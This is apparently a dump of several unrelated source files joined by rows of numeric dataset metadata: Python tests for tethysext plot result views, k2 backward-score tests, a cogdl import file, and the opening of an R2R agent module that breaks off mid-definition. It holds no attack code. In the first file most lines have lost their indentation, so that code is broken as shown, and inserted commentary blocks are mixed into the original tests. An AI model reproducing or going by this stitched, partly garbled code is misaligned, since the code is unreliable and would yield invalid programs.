workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
        # Verify that all the expected mock calls were made
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_plot_object(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
mock_result.name = 'page_title'
mock_result.datasets = [{
'plot_object': 'plot_object',
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
        # Verify that all the expected mock calls were made
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.BokehView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_bokeh_add_series_list(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'BokehView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = [[datetime(2020, 1, 2), datetime(2020, 1, 3), datetime(2020, 1, 4), datetime(2020, 1, 5),
datetime(2020, 1, 6), datetime(2020, 1, 7)], [2, 3, 4, 5, 6, 7]]
mock_result.datasets = [{
'title': 'series title',
'dataset': data_test,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['bokeh', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'BokehView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
        # Verify that all the expected mock calls were made
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.BokehView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_bokeh_scatter_add_series_list(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'BokehView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = [[datetime(2020, 1, 2), datetime(2020, 1, 3), datetime(2020, 1, 4), datetime(2020, 1, 5),
datetime(2020, 1, 6), datetime(2020, 1, 7)], [2, 3, 4, 5, 6, 7]]
mock_result.datasets = [{
'title': 'series title',
'dataset': data_test,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['bokeh', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'BokehView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
        # Verify that all the expected mock calls were made
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_add_series_list(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = [[datetime(2020, 1, 2), datetime(2020, 1, 3), datetime(2020, 1, 4), datetime(2020, 1, 5),
datetime(2020, 1, 6), datetime(2020, 1, 7)], [2, 3, 4, 5, 6, 7]]
mock_result.datasets = [{
'title': 'series title',
'dataset': data_test,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
        # Verify that all the expected mock calls were made
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_add_series_numpy(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = [np.arange('2020-01-02', '2020-01-07', dtype='datetime64[D]'), np.array([1, 2, 3, 4, 5, 6])]
mock_result.datasets = [{
'title': 'series title',
'dataset': data_test,
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
        # Verify that all the expected mock calls were made
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotlyView') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.results_views.plot_workflow_results_view.PlotWorkflowResultView.get_result') # noqa: E501
@mock.patch('tethysext.atcore.controllers.resource_workflows.workflow_results_view.WorkflowResultsView.get_context') # noqa: E501
def test_get_context_add_series_pandas_multiple_columns(self, mock_sup_get_context, mock_get_result, mock_plot):
mock_resource = mock.MagicMock()
mock_request = mock.MagicMock()
mock_session = mock.MagicMock()
mock_context = mock.MagicMock()
mock_model_db = mock.MagicMock()
mock_workflow_id = mock.MagicMock()
mock_step_id = mock.MagicMock()
mock_result_id = mock.MagicMock()
mock_plot.return_value = 'PlotlyView'
mock_result = mock.MagicMock(get_plot_object=mock_plot)
mock_get_result.return_value = mock_result
data_test = {
'x': [datetime(2020, 1, 1), datetime(2020, 1, 2), datetime(2020, 1, 3), datetime(2020, 1, 4),
datetime(2020, 1, 5), datetime(2020, 1, 6)],
'y': [2, 4, 8, 16, 25, 36],
'y2': [3, 3*3, 9*3, 27*3, 9*3, 9],
}
data_test = pd.DataFrame(data=data_test)
mock_result.datasets = [{
'dataset': data_test,
'series_axes': [('x', 'y'), ('x', 'y1'), ('x', 'y2')],
            'series_labels': ['s1', 's2', 's3'],
}]
mock_options = mock.MagicMock(get=mock.MagicMock())
mock_result.options = mock_options
mock_options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
baseline = {
'page_title': 'page title',
'no_dataset_message': 'No dataset found.',
'plot_view_input': 'PlotlyView',
}
mock_sup_get_context.return_value = {}
ret = self.instance.get_context(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
        # Verify that all the expected mock calls were made
mock_sup_get_context.assert_called_with(
request=mock_request,
session=mock_session,
resource=mock_resource,
context=mock_context,
model_db=mock_model_db,
workflow_id=mock_workflow_id,
step_id=mock_step_id,
result_id=mock_result_id
)
mock_get_result.assert_called_with(
request=mock_request,
result_id=mock_result_id,
session=mock_session
)
self.assertEqual(baseline['no_dataset_message'], ret['no_dataset_message'])
self.assertEqual(baseline['plot_view_input'], ret['plot_view_input'])
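# --- Illustrative aside (not part of the original test file above) ----------------------
# Every test here drives get_context() through unittest.mock objects and relies on mock's
# documented behaviour that assigning a list to `side_effect` makes successive calls return
# successive items. A minimal standalone sketch of that pattern (the argument names passed
# to get() below are made up for illustration):
from unittest import mock

options = mock.MagicMock()
options.get.side_effect = ['plotly', 'page title', 'No dataset found.']
assert options.get('renderer') == 'plotly'                               # 1st call -> 1st item
assert options.get('page_title', 'title') == 'page title'                # 2nd call -> 2nd item
assert options.get('no_dataset_message', 'none') == 'No dataset found.'  # 3rd call -> 3rd item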
| 42.386282
| 155
| 0.650072
| 2,757
| 23,482
| 5.166123
| 0.048241
| 0.084884
| 0.088324
| 0.059678
| 0.947553
| 0.935477
| 0.928877
| 0.924384
| 0.910763
| 0.910763
| 0
| 0.019146
| 0.252662
| 23,482
| 553
| 156
| 42.462929
| 0.792467
| 0.022911
| 0
| 0.829218
| 0
| 0
| 0.192405
| 0.112309
| 0
| 0
| 0
| 0
| 0.067901
| 1
| 0.022634
| false
| 0
| 0.014403
| 0
| 0.039095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c7eddbfe90550cc41593fb5c60009fbd5d441e2
| 202
|
py
|
Python
|
cogdl/wrappers/data_wrapper/heterogeneous/__init__.py
|
fishmingyu/cogdl
|
f6f33c666feb874f13eb43a8adc5db7c918778ec
|
[
"MIT"
] | 6
|
2020-07-09T02:48:41.000Z
|
2021-06-16T09:04:14.000Z
|
cogdl/wrappers/data_wrapper/heterogeneous/__init__.py
|
fishmingyu/cogdl
|
f6f33c666feb874f13eb43a8adc5db7c918778ec
|
[
"MIT"
] | null | null | null |
cogdl/wrappers/data_wrapper/heterogeneous/__init__.py
|
fishmingyu/cogdl
|
f6f33c666feb874f13eb43a8adc5db7c918778ec
|
[
"MIT"
] | 1
|
2020-05-19T11:45:45.000Z
|
2020-05-19T11:45:45.000Z
|
from .heterogeneous_embedding_dw import HeterogeneousEmbeddingDataWrapper
from .heterogeneous_gnn_dw import HeterogeneousGNNDataWrapper
from .multiplex_embedding_dw import MultiplexEmbeddingDataWrapper
| 50.5
| 73
| 0.925743
| 18
| 202
| 10.055556
| 0.555556
| 0.132597
| 0.187845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059406
| 202
| 3
| 74
| 67.333333
| 0.952632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1c9a40aa74a7e259fdc2c2340d9afb4042e5e6ab
| 12,545
|
py
|
Python
|
k2/python/tests/get_backward_scores_test.py
|
BuildJet/k2
|
9b21fc4b97cd3e746b6526cd47359bb024d06b15
|
[
"Apache-2.0"
] | 1
|
2021-03-03T03:30:40.000Z
|
2021-03-03T03:30:40.000Z
|
k2/python/tests/get_backward_scores_test.py
|
BuildJet/k2
|
9b21fc4b97cd3e746b6526cd47359bb024d06b15
|
[
"Apache-2.0"
] | 1
|
2021-03-27T15:52:06.000Z
|
2021-03-27T15:52:06.000Z
|
k2/python/tests/get_backward_scores_test.py
|
BuildJet/k2
|
9b21fc4b97cd3e746b6526cd47359bb024d06b15
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright (c) 2020 Xiaomi Corp. (author: Fangjun Kuang)
#
# See ../../../LICENSE for clarification regarding multiple authors
# To run this single test, use
#
# ctest --verbose -R get_backward_scores_test_py
import unittest
import k2
import torch
class TestGetBackwardScores(unittest.TestCase):
def test_simple_fsa_case_1(self):
# see https://git.io/JtttZ
s = '''
0 1 1 0.0
0 1 2 0.1
0 2 3 2.2
1 2 4 0.5
1 2 5 0.6
1 3 -1 3.0
2 3 -1 0.8
3
'''
devices = [torch.device('cpu')]
if torch.cuda.is_available():
devices.append(torch.device('cuda'))
for device in devices:
for use_double_scores in [True, False]:
fsa = k2.Fsa.from_str(s).to(device).requires_grad_(True)
fsa_vec = k2.create_fsa_vec([fsa])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=False)
expected_backward_scores = torch.empty_like(backward_scores)
scores = fsa.scores.detach().clone().requires_grad_(True)
expected_backward_scores[3] = 0
# yapf:disable
expected_backward_scores[2] = expected_backward_scores[3] + scores[6] # noqa
expected_backward_scores[1] = expected_backward_scores[3] + scores[5] # noqa
expected_backward_scores[0] = expected_backward_scores[1] + scores[1] # noqa
# yapf:enable
assert torch.allclose(backward_scores,
expected_backward_scores)
scale = torch.arange(backward_scores.numel()).to(device)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa.grad, scores.grad)
# now for log semiring
fsa.scores.grad = None
fsa_vec = k2.create_fsa_vec([fsa])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=True)
expected_backward_scores = torch.zeros_like(backward_scores)
scores = fsa.scores.detach().clone().requires_grad_(True)
expected_backward_scores[3] = 0
# yapf:disable
expected_backward_scores[2] = expected_backward_scores[3] + scores[6] # noqa
# yapf:enable
expected_backward_scores[1] = (
(expected_backward_scores[2] + scores[3]).exp() +
(expected_backward_scores[2] + scores[4]).exp() +
(expected_backward_scores[3] + scores[5]).exp()).log()
expected_backward_scores[0] = (
(expected_backward_scores[1] + scores[0]).exp() +
(expected_backward_scores[1] + scores[1]).exp() +
(expected_backward_scores[2] + scores[2]).exp()).log()
assert torch.allclose(backward_scores,
expected_backward_scores)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa.grad, scores.grad)
def test_simple_fsa_case_2(self):
# see https://git.io/Jttmm
s = '''
0 1 1 0.1
0 1 2 0.2
1 2 3 0.3
1 2 4 0.4
1 2 5 0.5
2 3 6 0.6
2 3 7 0.7
3 4 -1 0.8
4
'''
devices = [torch.device('cpu')]
if torch.cuda.is_available():
devices.append(torch.device('cuda'))
for device in devices:
for use_double_scores in [True, False]:
fsa = k2.Fsa.from_str(s).to(device).requires_grad_(True)
fsa_vec = k2.create_fsa_vec([fsa])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=False)
expected_backward_scores = torch.empty_like(backward_scores)
scores = fsa.scores.detach().clone().requires_grad_(True)
expected_backward_scores[4] = 0
# yapf:disable
expected_backward_scores[3] = expected_backward_scores[4] + scores[7] # noqa
expected_backward_scores[2] = expected_backward_scores[3] + scores[6] # noqa
expected_backward_scores[1] = expected_backward_scores[2] + scores[4] # noqa
expected_backward_scores[0] = expected_backward_scores[1] + scores[1] # noqa
# yapf:enable
assert torch.allclose(backward_scores,
expected_backward_scores)
scale = torch.arange(backward_scores.numel()).to(device)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa.grad, scores.grad)
# now for log semiring
fsa.scores.grad = None
fsa_vec = k2.create_fsa_vec([fsa])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=True)
expected_backward_scores = torch.zeros_like(backward_scores)
scores = fsa.scores.detach().clone().requires_grad_(True)
expected_backward_scores[4] = 0
# yapf:disable
expected_backward_scores[3] = expected_backward_scores[4] + scores[7] # noqa
# yapf:enable
expected_backward_scores[2] = (
(expected_backward_scores[3] + scores[5]).exp() +
(expected_backward_scores[3] + scores[6]).exp()).log()
expected_backward_scores[1] = (
(expected_backward_scores[2] + scores[2]).exp() +
(expected_backward_scores[2] + scores[3]).exp() +
(expected_backward_scores[2] + scores[4]).exp()).log()
expected_backward_scores[0] = (
(expected_backward_scores[1] + scores[0]).exp() +
(expected_backward_scores[1] + scores[1]).exp()).log()
assert torch.allclose(backward_scores,
expected_backward_scores)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa.grad, scores.grad)
def test_simple_fsa_vec(self):
# combine case 1 and case 2
s1 = '''
0 1 1 0.0
0 1 2 0.1
0 2 3 2.2
1 2 4 0.5
1 2 5 0.6
1 3 -1 3.0
2 3 -1 0.8
3
'''
s2 = '''
0 1 1 0.1
0 1 2 0.2
1 2 3 0.3
1 2 4 0.4
1 2 5 0.5
2 3 6 0.6
2 3 7 0.7
3 4 -1 0.8
4
'''
devices = [torch.device('cpu')]
if torch.cuda.is_available():
devices.append(torch.device('cuda'))
for device in devices:
for use_double_scores in [True, False]:
fsa1 = k2.Fsa.from_str(s1).to(device).requires_grad_(True)
fsa2 = k2.Fsa.from_str(s2).to(device).requires_grad_(True)
fsa_vec = k2.create_fsa_vec([fsa1, fsa2])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=False)
scores1 = fsa1.scores.detach().clone().requires_grad_(True)
scores2 = fsa2.scores.detach().clone().requires_grad_(True)
expected_backward_scores1 = torch.empty_like(
backward_scores[:4])
expected_backward_scores2 = torch.empty_like(
backward_scores[4:])
expected_backward_scores1[3] = 0
# yapf:disable
expected_backward_scores1[2] = expected_backward_scores1[3] + scores1[6] # noqa
expected_backward_scores1[1] = expected_backward_scores1[3] + scores1[5] # noqa
expected_backward_scores1[0] = expected_backward_scores1[1] + scores1[1] # noqa
# yapf:enable
expected_backward_scores2[4] = 0
# yapf:disable
expected_backward_scores2[3] = expected_backward_scores2[4] + scores2[7] # noqa
expected_backward_scores2[2] = expected_backward_scores2[3] + scores2[6] # noqa
expected_backward_scores2[1] = expected_backward_scores2[2] + scores2[4] # noqa
expected_backward_scores2[0] = expected_backward_scores2[1] + scores2[1] # noqa
# yapf:enable
expected_backward_scores = torch.cat(
[expected_backward_scores1, expected_backward_scores2])
assert torch.allclose(backward_scores,
expected_backward_scores)
scale = torch.arange(backward_scores.numel()).to(device)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa1.grad, scores1.grad)
assert torch.allclose(fsa2.grad, scores2.grad)
# now for log semiring
fsa1.scores.grad = None
fsa2.scores.grad = None
fsa_vec = k2.create_fsa_vec([fsa1, fsa2])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=True)
scores1 = fsa1.scores.detach().clone().requires_grad_(True)
scores2 = fsa2.scores.detach().clone().requires_grad_(True)
expected_backward_scores1 = torch.empty_like(
backward_scores[:4])
expected_backward_scores2 = torch.empty_like(
backward_scores[4:])
expected_backward_scores1[3] = 0
# yapf:disable
expected_backward_scores1[2] = expected_backward_scores1[3] + scores1[6] # noqa
# yapf:enable
expected_backward_scores1[1] = (
(expected_backward_scores1[2] + scores1[3]).exp() +
(expected_backward_scores1[2] + scores1[4]).exp() +
(expected_backward_scores1[3] + scores1[5]).exp()).log()
expected_backward_scores1[0] = (
(expected_backward_scores1[1] + scores1[0]).exp() +
(expected_backward_scores1[1] + scores1[1]).exp() +
(expected_backward_scores1[2] + scores1[2]).exp()).log()
expected_backward_scores2[4] = 0
# yapf:disable
expected_backward_scores2[3] = expected_backward_scores2[4] + scores2[7] # noqa
# yapf:enable
expected_backward_scores2[2] = (
(expected_backward_scores2[3] + scores2[5]).exp() +
(expected_backward_scores2[3] + scores2[6]).exp()).log()
expected_backward_scores2[1] = (
(expected_backward_scores2[2] + scores2[2]).exp() +
(expected_backward_scores2[2] + scores2[3]).exp() +
(expected_backward_scores2[2] + scores2[4]).exp()).log()
expected_backward_scores2[0] = (
(expected_backward_scores2[1] + scores2[0]).exp() +
(expected_backward_scores2[1] + scores2[1]).exp()).log()
expected_backward_scores = torch.cat(
[expected_backward_scores1, expected_backward_scores2])
assert torch.allclose(backward_scores,
expected_backward_scores)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa1.grad, scores1.grad)
assert torch.allclose(fsa2.grad, scores2.grad)
if __name__ == '__main__':
unittest.main()
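# --- Illustrative aside (not part of the original test file above) ----------------------
# The assertions above rebuild k2's get_backward_scores() by hand: the final state gets
# backward score 0, and every other state aggregates (arc score + backward[dest]) over its
# outgoing arcs, using max in the tropical semiring and log-sum-exp in the log semiring.
# A minimal standalone sketch of that recursion, assuming states are already in topological
# order with the final state last (true for the toy FSAs above); `backward_scores` is a
# made-up helper name for this sketch, not a k2 API.
def backward_scores(arcs, num_states, log_semiring=True):
    b = torch.full((num_states,), float('-inf'))
    b[-1] = 0.0  # final state
    for state in reversed(range(num_states - 1)):
        terms = torch.stack([score + b[dst] for src, dst, score in arcs if src == state])
        b[state] = torch.logsumexp(terms, dim=0) if log_semiring else terms.max()
    return b

# Arcs (src, dst, score) of the FSA in test_simple_fsa_case_1, with labels dropped.
_demo_arcs = [(0, 1, 0.0), (0, 1, 0.1), (0, 2, 2.2), (1, 2, 0.5), (1, 2, 0.6), (1, 3, 3.0), (2, 3, 0.8)]
_trop = backward_scores(_demo_arcs, 4, log_semiring=False)
_log = backward_scores(_demo_arcs, 4, log_semiring=True)
assert torch.allclose(_trop, torch.tensor([3.1, 3.0, 0.8, 0.0]))  # matches the max recursion above
assert bool((_log >= _trop).all())  # log-sum-exp dominates max, state by state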
| 46.291513
| 95
| 0.545397
| 1,379
| 12,545
| 4.68963
| 0.079043
| 0.262255
| 0.197309
| 0.038967
| 0.938766
| 0.916345
| 0.856812
| 0.831761
| 0.831761
| 0.740838
| 0
| 0.050259
| 0.35289
| 12,545
| 270
| 96
| 46.462963
| 0.746366
| 0.052371
| 0
| 0.746479
| 0
| 0
| 0.06647
| 0
| 0
| 0
| 0
| 0
| 0.065728
| 1
| 0.014085
| false
| 0
| 0.014085
| 0
| 0.032864
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c714657044a03b62453571e81027d911b705f819
| 151,322
|
py
|
Python
|
tasks/NDH/r2ragent.py
|
guhur/PREVALENT_R2R
|
c63ce840192c03338bc1e58ebac9e535de455dde
|
[
"MIT-0",
"MIT"
] | 5
|
2020-08-12T14:49:22.000Z
|
2022-02-13T21:48:30.000Z
|
tasks/NDH/r2ragent.py
|
guhur/PREVALENT_R2R
|
c63ce840192c03338bc1e58ebac9e535de455dde
|
[
"MIT-0",
"MIT"
] | 16
|
2020-07-26T08:28:56.000Z
|
2022-03-12T00:43:03.000Z
|
tasks/NDH/r2ragent.py
|
guhur/PREVALENT_R2R
|
c63ce840192c03338bc1e58ebac9e535de455dde
|
[
"MIT-0",
"MIT"
] | 4
|
2020-07-30T06:25:31.000Z
|
2021-03-03T10:08:35.000Z
|
''' Agents: stop/random/shortest/seq2seq '''
import json
import os
import sys
import numpy as np
import random
import time
import pickle
import torch
import torch.nn as nn
import torch.distributions as D
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import copy
from env import debug_beam
from utils import padding_idx, to_contiguous, clip_gradient
from agent_utils import basic_actions, sort_batch, teacher_action, discount_rewards, backchain_inference_states, path_element_from_observation, InferenceState, WorldState, least_common_viewpoint_path
from collections import Counter, defaultdict
import pdb
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
testing_settingA = False
# region Simple Agents
class BaseAgent(object):
''' Base class for an R2R agent to generate and save trajectories. '''
def __init__(self, env, results_path, seed=1):
self.env = env
self.results_path = results_path
if seed != 'resume': random.seed(seed)
self.results = {}
self.losses = [] # For learning agents
self.testing_settingA = False
def write_results(self, dump_file=False):
if '_' in list(self.results.keys())[0]:
#if testing_settingA:
if self.testing_settingA:
# choose one from three according to prob
for id in self.results:
bestp, best = self.results[id][1], self.results[id]
for ii in range(4):
temp_id = "%s_%d" % (id[:-2], ii)
if temp_id in self.results and self.results[temp_id][1] > bestp:
bestp = self.results[temp_id][1]
best = self.results[temp_id]
self.results[id] = best
output = [{'instr_id': k, 'trajectory': v[0]} for k, v in self.results.items()]
else:
output = [{'instr_id': k, 'trajectory': v} for k, v in self.results.items()]
else:
output = [{'instr_id':'%s_%d' % (k, i), 'trajectory': v} for k,v in self.results.items() for i in range(self.env.traj_n_sents[k])]
if dump_file:
with open(self.results_path, 'w') as f:
json.dump(output, f)
return output
def rollout(self, beam_size=1):
''' Return a list of dicts containing instr_id:'xx', path:[(viewpointId, heading_rad, elevation_rad)] '''
raise NotImplementedError
@staticmethod
def get_agent(name):
